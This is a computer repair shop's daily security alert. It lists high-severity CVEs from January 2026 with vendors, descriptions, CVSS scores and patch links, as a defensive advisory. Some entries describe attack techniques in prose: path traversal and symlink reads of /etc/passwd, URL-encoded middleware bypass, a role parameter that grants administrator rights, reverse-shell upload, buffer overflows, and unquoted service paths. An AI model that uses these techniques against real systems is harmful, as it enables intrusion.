Computer Repair Center posts the daily security alert below. Please check whether your server, web server, email server and PC are affected by the vulnerabilities listed below and fix them as soon as possible. You may also contact our IT experts at 9145-7188.
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Agatasoft--AgataSoft PingMaster Pro | AgataSoft PingMaster Pro 2.1 contains a denial of service vulnerability in the Trace Route feature that allows attackers to crash the application by overflowing the host name input field. Attackers can generate a 10,000-character buffer and paste it into the host name field to trigger an application crash and potential system instability. | 2026-01-23 | 7.5 | CVE-2021-47893 | ExploitDB-49567 Vendor Homepage VulnCheck Advisory: AgataSoft PingMaster Pro 2.1 - Denial of Service |
| Aida Computer Information Technology Inc.--Hotel Guest Hotspot | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows SQL Injection. This issue affects Hotel Guest Hotspot: through 22012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 8 | CVE-2025-4764 | https://www.usom.gov.tr/bildirim/tr-26-0001 |
| Altium--AES | AES contains a SQL injection vulnerability due to an inactive configuration that prevents the latest SQL parsing logic from being applied. When this configuration is not enabled, crafted input may be improperly handled, allowing attackers to inject and execute arbitrary SQL queries. | 2026-01-22 | 8.6 | CVE-2025-27378 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--AES | HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim's browser via crafted HTML content. | 2026-01-22 | 7.6 | CVE-2025-27380 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium 365 | Altium 365 workspace endpoints were configured with an overly permissive Cross-Origin Resource Sharing (CORS) policy that allowed credentialed cross-origin requests from other Altium-controlled subdomains, including forum.live.altium.com. As a result, JavaScript executing on those origins could access authenticated workspace APIs in the context of a logged-in user. When chained with vulnerabilities in those external applications, this misconfiguration enables unauthorized access to workspace data, administrative actions, and bypass of IP allowlisting controls, including in GovCloud environments. | 2026-01-19 | 9 | CVE-2026-1181 | https://www.altium.com/platform/security-compliance/security-advisories |
| HAMASTAR Technology--MeetingHub | MeetingHub developed by HAMASTAR Technology has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-22 | 9.8 | CVE-2026-1331 | https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html |
| appsmithorg--appsmith | Appsmith is a platform to build admin panels, internal tools, and dashboards. In versions 1.94 and below, publicly accessible apps allow unauthenticated users to execute unpublished (edit-mode) actions by sending viewMode=false (or omitting it) to POST /api/v1/actions/execute. This bypasses the expected publish boundary where public viewers should only execute published actions, not edit-mode versions. An attack can result in sensitive data exposure, execution of edit‑mode queries and APIs, development data access, and the ability to trigger side effect behavior. This issue does not have a released fix at the time of publication. | 2026-01-22 | 9.4 | CVE-2026-24042 | https://github.com/appsmithorg/appsmith/security/advisories/GHSA-j9qq-4fj9-9883 |
| Autodesk--Fusion | A maliciously crafted HTML payload in a design name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process. | 2026-01-22 | 7.1 | CVE-2026-0533 | https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001 |
| Autodesk--Fusion | A maliciously crafted HTML payload, stored in a part's attribute and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process. | 2026-01-22 | 7.1 | CVE-2026-0534 | https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001 |
| Autodesk--Fusion | A maliciously crafted HTML payload, stored in a component's description and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process. | 2026-01-22 | 7.1 | CVE-2026-0535 | https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001 |
| Autonomy--OpenPLC | OpenPLC v3 contains an authenticated remote code execution vulnerability that allows attackers with valid credentials to inject malicious code through the hardware configuration interface. Attackers can upload a custom hardware layer with embedded reverse shell code that establishes a network connection to a specified IP and port, enabling remote command execution. | 2026-01-21 | 8.8 | CVE-2021-47770 | ExploitDB-49803 OpenPLC Project Official Homepage OpenPLC v3 GitHub Repository VulnCheck Advisory: OpenPLC 3 - Remote Code Execution |
| B&R Industrial Automation GmbH--B&R Automation Studio | An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges. | 2026-01-19 | 7.4 | CVE-2025-11043 | https://www.br-automation.com/fileadmin/SA25P004-4f45197f.pdf |
| backstage--backstage | Backstage is an open framework for building developer portals. Multiple Scaffolder actions and archive extraction utilities were vulnerable to symlink-based path traversal attacks. An attacker with access to create and execute Scaffolder templates could exploit symlinks to read arbitrary files via the `debug:log` action by creating a symlink pointing to sensitive files (e.g., `/etc/passwd`, configuration files, secrets); delete arbitrary files via the `fs:delete` action by creating symlinks pointing outside the workspace, and write files outside the workspace via archive extraction (tar/zip) containing malicious symlinks. This affects any Backstage deployment where users can create or execute Scaffolder templates. This vulnerability is fixed in `@backstage/backend-defaults` versions 0.12.2, 0.13.2, 0.14.1, and 0.15.0; `@backstage/plugin-scaffolder-backend` versions 2.2.2, 3.0.2, and 3.1.1; and `@backstage/plugin-scaffolder-node` versions 0.11.2 and 0.12.3. Users should upgrade to these versions or later. Some workarounds are available. Follow the recommendation in the Backstage Threat Model to limit access to creating and updating templates, restrict who can create and execute Scaffolder templates using the permissions framework, audit existing templates for symlink usage, and/or run Backstage in a containerized environment with limited filesystem access. | 2026-01-21 | 7.1 | CVE-2026-24046 | https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d |
| baptisteArno--typebot.io | Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue. | 2026-01-22 | 7.4 | CVE-2025-65098 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47 |
| Birebirsoft Software and Technology Solutions--Sufirmam | Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Authentication Bypass, Password Recovery Exploitation. This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-23 | 10 | CVE-2025-4320 | https://www.usom.gov.tr/bildirim/tr-26-0005 |
| Birebirsoft Software and Technology Solutions--Sufirmam | Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation. This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-23 | 9.4 | CVE-2025-4319 | https://www.usom.gov.tr/bildirim/tr-26-0005 |
| Brother Industries, Ltd.--BRAdmin Professional | Brother BRAdmin Professional 3.75 contains an unquoted service path vulnerability in the BRA_Scheduler service that allows local users to potentially execute arbitrary code. Attackers can place a malicious executable named 'BRAdmin' in the C:\Program Files (x86)\Brother\ directory to gain local system privileges. | 2026-01-21 | 7.8 | CVE-2021-47869 | ExploitDB-49671 Brother Global Homepage Brother Software Download Page Vulnerability Technical Details VulnCheck Advisory: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path |
| BROWAN COMMUNICATIONS--PrismX MX100 AP controller | PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has a Use of Hard-coded Credentials vulnerability, allowing unauthenticated remote attackers to log in to the database using hardcoded database credentials stored in the firmware. | 2026-01-20 | 9.8 | CVE-2026-1221 | https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html |
| BROWAN COMMUNICATIONS--PrismX MX100 AP controller | PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-20 | 7.2 | CVE-2026-1222 | https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html |
| buddypress--BuddyPress | The BuddyPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 14.3.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2026-01-23 | 7.3 | CVE-2024-11976 | https://www.wordfence.com/threat-intel/vulnerabilities/id/34c627c1-7838-468e-acb7-eb84ad1b4949?source=cve https://plugins.trac.wordpress.org/browser/buddypress/tags/14.3.1/bp-templates/bp-nouveau/includes/messages/ajax.php#L232 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3259392%40buddypress%2Ftrunk&old=3199645%40buddypress%2Ftrunk&sfp_email=&sfph_mail= |
| chattermate--chattermate.chat | ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an <iframe> payload containing a javascript: URI can be processed and executed in the browser context. This allows access to sensitive client-side data such as localStorage tokens and cookies, resulting in client-side injection. This issue has been fixed in version 1.0.9. | 2026-01-24 | 9.3 | CVE-2026-24399 | https://github.com/chattermate/chattermate.chat/security/advisories/GHSA-72p3-w95w-q3j4 https://github.com/chattermate/chattermate.chat/commit/ff3398031abb97ae28546eaf993fed3619eaffdd https://github.com/chattermate/chattermate.chat/releases/tag/v1.0.9 |
| choijun--LA-Studio Element Kit for Elementor | The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site. | 2026-01-22 | 9.8 | CVE-2026-0920 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65ebc744-6cc2-47ce-b225-81820e49d59c?source=cve https://plugins.trac.wordpress.org/browser/lastudio-element-kit/tags/1.5.6.3/includes/integrations/override.php#L301 https://plugins.trac.wordpress.org/changeset/3439121/lastudio-element-kit |
| Cisco--Cisco Unified Communications Manager | A vulnerability in Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to improper validation of user-supplied input in HTTP requests. An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root. | 2026-01-21 | 8.2 | CVE-2026-20045 | cisco-sa-voice-rce-mORhqY4b |
| CRMEB--CRMEB | A security flaw has been discovered in CRMEB up to 5.6.3. The affected element is the function appleLogin of the file crmeb/app/api/controller/v1/LoginController.php. Performing a manipulation of the argument openId results in improper authentication. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 7.3 | CVE-2026-1202 | VDB-341788 (CRMEB LoginController.php appleLogin improper authentication); VDB-341788 (CTI Indicators: IOB, IOC, IOA); Submit #734711 (Zhongbang CRMEB v5.6.3 Improper Authentication); https://github.com/foeCat/CVE/blob/main/CRMEB/apple_login_auth_bypass.md |
| Data Device Corporation--dataSIMS Avionics ARINC | dataSIMS Avionics ARINC 664-1 version 4.5.3 contains a local buffer overflow vulnerability that allows attackers to overwrite memory by manipulating the milstd1553result.txt file. Attackers can craft a malicious file with carefully constructed payload and alignment sections to potentially execute arbitrary code on the Windows system. | 2026-01-23 | 8.4 | CVE-2021-47881 | ExploitDB-49577 Vendor Homepage Software Product Page VulnCheck Advisory: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow |
| Deepinstinct--Deep Instinct Windows Agent | Deep Instinct Windows Agent 1.2.24.0 contains an unquoted service path vulnerability in the DeepNetworkService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files\HP Sure Sense\DeepNetworkService.exe to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-25 | 7.8 | CVE-2020-36934 | ExploitDB-49020 Deep Instinct Official Homepage HP Collaboration Announcement VulnCheck Advisory: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contain a Use of Default Credentials vulnerability in the OS. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-01-23 | 8.8 | CVE-2026-22273 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contain a Cleartext Transmission of Sensitive Information vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information exposure. | 2026-01-23 | 7.5 | CVE-2026-22271 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS versions prior to 9.13.0.0 contain an improper restriction of excessive authentication attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access. | 2026-01-22 | 8.1 | CVE-2026-22278 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--Unisphere for PowerMax | Dell Unisphere for PowerMax, versions 10.2.0.x, contain an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution. | 2026-01-22 | 8.8 | CVE-2025-36588 | https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities |
| docling-project--docling-core | Docling Core (or docling-core) is a library that defines core data types and transformations in the document processing application Docling. A PyYAML-related Remote Code Execution (RCE) vulnerability, namely CVE-2020-14343, is exposed in docling-core starting in version 2.21.0 and prior to version 2.48.4, specifically only if the application uses pyyaml prior to version 5.4 and invokes `docling_core.types.doc.DoclingDocument.load_from_yaml()` passing it untrusted YAML data. The vulnerability has been patched in docling-core version 2.48.4. The fix mitigates the issue by switching `PyYAML` deserialization from `yaml.FullLoader` to `yaml.SafeLoader`, ensuring that untrusted data cannot trigger code execution. Users who cannot immediately upgrade docling-core can alternatively ensure that the installed version of PyYAML is 5.4 or greater. | 2026-01-22 | 8.1 | CVE-2026-24009 | https://github.com/docling-project/docling-core/security/advisories/GHSA-vqxf-v2gg-x3hc https://github.com/docling-project/docling-core/issues/482 https://github.com/docling-project/docling-core/commit/3e8d628eeeae50f0f8f239c8c7fea773d065d80c https://github.com/advisories/GHSA-8q59-q68h-6hv4 https://github.com/docling-project/docling-core/releases/tag/v2.48.4 |
| dokaninc--Dokan: AI Powered WooCommerce Multivendor Marketplace Solution Build Your Own Amazon, eBay, Etsy | The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.2.4 via the `/wp-json/dokan/v1/settings` REST API endpoint due to missing validation on a user-controlled key. This makes it possible for authenticated attackers, with customer-level permissions and above, to read or modify other vendors' store settings including sensitive payment information (PayPal email, bank account details, routing numbers, IBAN, SWIFT codes), phone numbers, and addresses, and change PayPal email addresses to attacker-controlled addresses, enabling financial theft when the marketplace processes payouts. | 2026-01-20 | 8.1 | CVE-2025-14977 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ab9d7e9-9a81-48f8-bc37-ad6de43a566f?source=cve https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L131 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L152 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L109 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L85 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432750%40dokan-lite%2Ftrunk&old=3427612%40dokan-lite%2Ftrunk&sfp_email=&sfph_mail=#file7 |
| embeDD GmbH--DD-WRT | DD-WRT version 45723 contains a buffer overflow vulnerability in the UPNP network discovery service that allows remote attackers to potentially execute arbitrary code. Attackers can send crafted M-SEARCH packets with oversized UUID payloads to trigger buffer overflow conditions on the target device. | 2026-01-21 | 9.8 | CVE-2021-47854 | ExploitDB-49730 DD-WRT Official Vendor Homepage DD-WRT Software Download Repository SSD Security Advisory for DD-WRT UPNP Buffer Overflow VulnCheck Advisory: DD-WRT 45723 - UPNP Buffer Overflow |
| Epiphany--Epiphany | A flaw was found in Epiphany, a tool that allows websites to open external URL handler applications with minimal user interaction. This design can be misused to exploit vulnerabilities within those handlers, making them appear remotely exploitable. The browser fails to properly warn or gate this action, resulting in potential code execution on the client device via trusted UI behavior. | 2026-01-23 | 8 | CVE-2025-3839 | https://access.redhat.com/security/cve/CVE-2025-3839 RHBZ#2361430 |
| Epson America, Inc.--Epson USB Display | Epson USB Display 1.6.0.0 contains an unquoted service path vulnerability in the EMP_UDSA service running with LocalSystem privileges. Attackers can exploit the unquoted path by placing malicious executables in intermediate directories to gain elevated system access. | 2026-01-23 | 7.8 | CVE-2021-47898 | ExploitDB-49548 Epson Official Homepage VulnCheck Advisory: Epson USB Display 1.6.0.0 Unquoted Service Path Vulnerability |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, an integer overflow occurring in `SdpPacket::parse_header()` allows the current buffer length to be set to 7 after a complete header of size 8 has been read. The remaining length to read is computed using the current length subtracted by the header length which results in a negative value. This value is then interpreted as `SIZE_MAX` (or slightly less) because the expected type of the argument is `size_t`. Depending on whether the server is plain TCP or TLS, this leads to either an infinite loop or a stack buffer overflow. Version 2025.10.0 fixes the issue. | 2026-01-21 | 8.4 | CVE-2025-68137 | https://github.com/EVerest/everest-core/security/advisories/GHSA-7qq4-q9r8-wc7w |
| EVerest--everest-core | EVerest is an EV charging software stack. In versions 2025.9.0 and below, an attacker can exhaust the operating system's memory and cause the module to terminate by initiating an unlimited number of TCP connections that never proceed to ISO 15118-2 communication. This is possible because a new thread is started for each incoming plain TCP or TLS socket connection before any verification occurs, and the verification performed is too permissive. The EVerest processes and all its modules shut down, affecting all EVSE functionality. This issue is fixed in version 2025.10.0. | 2026-01-21 | 7.4 | CVE-2025-68133 | https://github.com/EVerest/everest-core/security/advisories/GHSA-mv3w-pp85-5h7c https://github.com/EVerest/everest-core/commit/8127b8c54b296c4dd01b356ac26763f81f76a8fd https://github.com/EVerest/everest-core/commit/de504f0c11069010d26767b0952739e9a400cef3 |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, the use of the `assert` function to handle errors frequently causes the module to crash. This is particularly critical because the manager shuts down all other modules and exits when any one of them terminates, leading to a denial of service. In a context where a manager handles multiple EVSE, this would also impact other users. Version 2025.10.0 fixes the issue. | 2026-01-21 | 7.4 | CVE-2025-68134 | https://github.com/EVerest/everest-core/security/advisories/GHSA-cxc5-rrj5-8pf3 |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, once the module receives an SDP request, it creates a whole new set of objects such as `Session` and `IConnection`, which open a new TCP socket for the ISO 15118-20 communications and register callbacks for the created file descriptor, without closing and destroying the previous ones. The previous `Session` is not saved and the `unique_ptr` owning it is lost, destroying the connection data. Later, if the socket in use (and therefore its file descriptor) is not the last one created, this leads to a null pointer dereference. Version 2025.10.0 fixes the issue. | 2026-01-21 | 7.4 | CVE-2025-68136 | https://github.com/EVerest/everest-core/security/advisories/GHSA-4h8h-x5cp-g22r |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, during the deserialization of a `DC_ChargeLoopRes` message that includes Receipt as well as TaxCosts, the `vector<DetailedTax> tax_costs` member in the target `Receipt` structure is accessed out of bounds. This occurs in the method `template <> void convert(const struct iso20_dc_DetailedTaxType& in, datatypes::DetailedTax& out)`, which leads to a null pointer dereference and causes the module to terminate. The EVerest processes and all its modules shut down, affecting all EVSE. Version 2025.10.0 fixes the issue. | 2026-01-21 | 7.4 | CVE-2025-68141 | https://github.com/EVerest/everest-core/security/advisories/GHSA-ph4w-r9q8-vm9h |
| EVMAPA--EVMAPA | This vulnerability occurs when a WebSocket endpoint does not enforce proper authentication mechanisms, allowing unauthorized users to establish connections. As a result, attackers can exploit this weakness to gain unauthorized access to sensitive data or perform unauthorized actions. Given that no authentication is required, this can lead to privilege escalation and potentially compromise the security of the entire system. | 2026-01-22 | 9.4 | CVE-2025-54816 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json |
| EVMAPA--EVMAPA | This vulnerability arises because there are no limitations on the number of authentication attempts a user can make. An attacker can exploit this weakness by continuously sending authentication requests, leading to a denial-of-service (DoS) condition. This can overwhelm the authentication system, rendering it unavailable to legitimate users and potentially causing service disruption. This can also allow attackers to conduct brute-force attacks to gain unauthorized access. | 2026-01-22 | 7.5 | CVE-2025-53968 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json |
| EVMAPA--EVMAPA | This vulnerability occurs when the system permits multiple simultaneous connections to the backend using the same charging station ID. This can result in unauthorized access, data inconsistency, or potential manipulation of charging sessions. The lack of proper session management and expiration control allows attackers to exploit this weakness by reusing valid charging station IDs to establish multiple sessions concurrently. | 2026-01-22 | 7.3 | CVE-2025-55705 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json |
| EXERT Computer Technologies Software Ltd. Co.--Education Management System | Authorization Bypass Through User-Controlled Key vulnerability in EXERT Computer Technologies Software Ltd. Co. Education Management System allows Parameter Injection. This issue affects Education Management System: through 23.09.2025. | 2026-01-22 | 7.5 | CVE-2025-10024 | https://www.usom.gov.tr/bildirim/tr-26-0002 |
| fastify--fastify-express | The @fastify/express plugin adds full Express compatibility to Fastify. A security vulnerability exists in @fastify/express prior to version 4.0.3 where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints. The vulnerability is caused by how @fastify/express matches requests against registered middleware paths. This vulnerability is similar to, but differs from, CVE-2026-22031 because this is a different npm module with its own code. Version 4.0.3 of @fastify/express contains a patch for the issue. | 2026-01-19 | 8.4 | CVE-2026-22037 | https://github.com/fastify/fastify-express/security/advisories/GHSA-g6q3-96cp-5r5m https://github.com/fastify/fastify-express/commit/dc02a3fe1387f945143f22597baa42557d549a40 |
| fastify--middie | @fastify/middie is the plugin that adds middleware support on steroids to Fastify. A security vulnerability exists in @fastify/middie prior to version 9.1.0 where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints. Version 9.1.0 fixes the issue. | 2026-01-19 | 8.4 | CVE-2026-22031 | https://github.com/fastify/middie/security/advisories/GHSA-cxrg-g7r8-w69p https://github.com/fastify/middie/pull/245 https://github.com/fastify/middie/commit/d44cd56eb724490babf7b452fdbbdd37ea2effba https://github.com/fastify/middie/releases/tag/v9.1.0 |
| FOGProject--fogproject | FOG is a free open-source cloning/imaging/rescue suite/inventory management system. Versions 1.5.10.1754 and below contain an unauthenticated SSRF vulnerability in getversion.php which can be triggered by providing a user-controlled url parameter. It can be used to fetch both internal websites and files on the machine running FOG. This appears to be reachable without an authenticated web session when the request includes newService=1. The issue does not have a fixed release version at the time of publication. | 2026-01-23 | 7.5 | CVE-2026-24138 | https://github.com/FOGProject/fogproject/security/advisories/GHSA-79xw-c2qx-g7xj |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. A vulnerability present in version 1.7.65 and potentially earlier versions allows unauthenticated users to bypass the mandatory authentication check in the roleBasedAuthMiddleware. By simply not providing an authentication cookie (making req.user undefined), a request is incorrectly passed through to downstream handlers. All users running MyTube with loginEnabled: true are impacted. This flaw allows an attacker to access and modify application settings via /api/settings, change administrative and visitor passwords, and access other protected routes that rely on this specific middleware. The problem is patched in v1.7.66, and the MyTube maintainers recommend that all users upgrade to v1.7.66 or later immediately to secure their instances. The fix ensures that the middleware explicitly blocks requests if a user is not authenticated, rather than defaulting to next(). Those who cannot upgrade immediately can mitigate risk by restricting network access with a firewall or reverse proxy (such as Nginx) so that the /api/ endpoints are reachable only from trusted IP addresses, or, if they are comfortable editing the source code, by manually patching roleBasedAuthMiddleware so that its logic defaults to an error (401 Unauthorized) when req.user is undefined instead of calling next(). | 2026-01-19 | 9.8 | CVE-2026-23837 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-cmvj-g69f-8664 https://github.com/franklioxygen/MyTube/commit/f85ae9b0d6e4a6480c6af5b675a99069d08d496e |
| FreeLAN--FreeLAN | FreeLAN 2.2 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with elevated LocalSystem privileges during service startup. | 2026-01-21 | 7.8 | CVE-2021-47882 | ExploitDB-49630 FreeLAN GitHub Repository VulnCheck Advisory: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path |
| frustratedProton--http-server | C++ HTTP Server is an HTTP/1.1 server built to handle client connections and serve HTTP requests. Versions 1.0 and below are vulnerable to Path Traversal via the RequestHandler::handleRequest method. This flaw allows an unauthenticated, remote attacker to read arbitrary files from the server's filesystem by crafting a malicious HTTP GET request containing ../ sequences. The application fails to sanitize the filename variable derived from the user-controlled URL path, directly concatenating it to the files_directory base path and enabling traversal outside the intended root. No patch was available at the time of publication. | 2026-01-24 | 7.5 | CVE-2026-24469 | https://github.com/frustratedProton/http-server/security/advisories/GHSA-qp54-6gfq-3gff |
| FSPro Labs--Event Log Explorer | Event Log Explorer 4.9.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path by placing malicious executables in specific file system locations that will be executed with LocalSystem account privileges during service startup. | 2026-01-21 | 7.8 | CVE-2021-47861 | ExploitDB-49704 Vendor Homepage VulnCheck Advisory: Event Log Explorer 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path |
| Fyrolabs LLC.--Pingzapper | Pingzapper 2.3.1 contains an unquoted service path vulnerability in the PingzapperSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Pingzapper\PZService.exe' to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47886 | ExploitDB-49626 Vendor Homepage Software Download Page VulnCheck Advisory: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path |
| Genexis--Platinum-4410 | Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the 'start_addr' parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page. | 2026-01-21 | 7.2 | CVE-2021-47858 | ExploitDB-49709 Genexis Product Page VulnCheck Advisory: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting |
